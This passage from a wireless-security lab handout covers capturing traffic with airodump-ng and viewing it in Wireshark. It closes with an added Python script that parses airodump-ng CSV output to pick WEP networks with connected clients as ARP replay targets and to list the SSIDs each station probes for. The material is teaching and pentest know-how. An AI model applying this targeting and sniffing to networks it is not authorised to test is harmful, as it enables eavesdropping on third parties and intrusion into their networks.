Then you will only listen on channel n. Locking the channel matters when you are logging: while hopping, the card spends only a fraction of its time on the target's channel and misses most of its frames. Note also that -w takes a prefix, not a file name; airodump-ng appends a sequence number and extension, so the capture above lands in /tmp/capture_file-01.cap (with a matching .csv summary alongside it).
Step 6. To view the traffic that we have captured, open the capture file in your favourite protocol analyzer. For this purpose we will use Wireshark. At the command prompt type:

  wireshark /tmp/capture_file-01.cap

and look for interesting traffic. (More details about this will be given in another lesson, but as a quick example, in our capture file we were able to watch someone log in to their web-based email account.)

What you learned in this lab:
In this lab you learned to use airodump-ng to:
  1. Find MAC addresses of access points within range
  2. Find broadcast SSIDs in range
  3. Capture and view traffic of wireless networks
  4. Find MAC addresses of wireless clients within range
  5. Get an overall picture of the type of traffic happening on your target network
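Besides the .cap file, airodump-ng -w also writes a .csv summary with the same columns as the live display: one table of access points, a blank line, and one table of stations. The Python below is an added example, not part of the handout or of aircrack-ng, that reads that summary to answer the questions the labs in this section ask by hand: which WEP networks have an associated client (the precondition for the ARP replay attack in Lab 4.5) and which stations are probing for which SSIDs. The embedded CSV is a constructed sample in the column layout I have assumed for airodump-ng's CSV output (the parser is driven by the header names, so a differently ordered file still parses); the first AP and station are the lab's MAC addresses, the others are made up.

```python
"""Parse airodump-ng's CSV summary to pick targets programmatically. Added example."""
import csv
import io

# Constructed sample in the layout assumed for airodump-ng -w <prefix> (-01.csv).
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:18:39:C8:F3:0F, 2011-01-12 10:01:03, 2011-01-12 10:14:55,  6,  54, WEP , WEP,  , -41,   812,  357169,   0.  0.  0.  0,   8, linksysl, 
00:0F:66:AA:BB:CC, 2011-01-12 10:01:05, 2011-01-12 10:14:50, 11,  54, WPA , TKIP, PSK, -63,   400,       0,   0.  0.  0.  0,   6, corpap, 
00:1C:F0:11:22:33, 2011-01-12 10:02:00, 2011-01-12 10:14:52,  1,  54, OPN ,     ,    , -70,   120,       0,   0.  0.  0.  0,   9, cafe-free, 
00:0C:41:77:88:99, 2011-01-12 10:01:09, 2011-01-12 10:14:53,  3,  11, WEP , WEP,  , -80,    50,    1200,   0.  0.  0.  0,   7, oldnet1, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:13:46:9F:AC:36, 2011-01-12 10:01:10, 2011-01-12 10:14:55, -38,   128332, 00:18:39:C8:F3:0F, linksysl
00:21:5C:DE:AD:01, 2011-01-12 10:03:12, 2011-01-12 10:14:40, -55,       42, (not associated) , corpap,homewifi
"""


def _parse_table(block: str) -> list:
    """One header-driven table. The last column (Key / Probed ESSIDs) may itself contain
    commas, so any overflow fields are joined back into it instead of being dropped."""
    rows = list(csv.reader(io.StringIO(block)))
    header = [h.strip() for h in rows[0]]
    records = []
    for raw in rows[1:]:
        fields = [f.strip() for f in raw]
        if not fields or not fields[0]:
            continue
        fixed = fields[:len(header) - 1] + [",".join(fields[len(header) - 1:])]
        records.append(dict(zip(header, fixed)))
    return records


def parse_airodump_csv(text: str):
    """Return (access_points, stations) as lists of dicts keyed by the CSV header names."""
    text = text.replace("\r\n", "\n").strip()
    ap_block, station_block = text.split("\n\n", 1)
    return _parse_table(ap_block), _parse_table(station_block)


def wep_targets_with_clients(aps: list, stations: list) -> list:
    """WEP networks that have at least one associated station: the ARP replay attack needs
    a live client MAC to spoof, so a WEP network with no clients is a different (harder) job."""
    clients = {}
    for s in stations:
        clients.setdefault(s["BSSID"], []).append(s["Station MAC"])
    return [(ap["BSSID"], ap["ESSID"], int(ap["channel"]), int(ap["# IV"]), clients[ap["BSSID"]])
            for ap in aps if ap["Privacy"].startswith("WEP") and ap["BSSID"] in clients]


def probed_ssids(stations: list) -> dict:
    """Station MAC -> list of SSIDs it has probed for; unassociated stations still reveal
    the networks they remember, which is what the bottom half of the airodump display shows."""
    return {s["Station MAC"]: [p for p in s["Probed ESSIDs"].split(",") if p] for s in stations}


if __name__ == "__main__":
    aps, stations = parse_airodump_csv(SAMPLE_CSV)
    for bssid, essid, channel, ivs, macs in wep_targets_with_clients(aps, stations):
        print(f"WEP target {essid} ({bssid}) ch {channel}, {ivs} IVs so far, clients: {macs}")
    for mac, ssids in probed_ssids(stations).items():
        print(f"{mac} probing for {ssids}")
```

Run it against the real file as `parse_airodump_csv(open('/tmp/capture_file-01.csv').read())`; the same dicts can drive the channel lock and the -b/-h arguments of the replay attack instead of reading them off the screen.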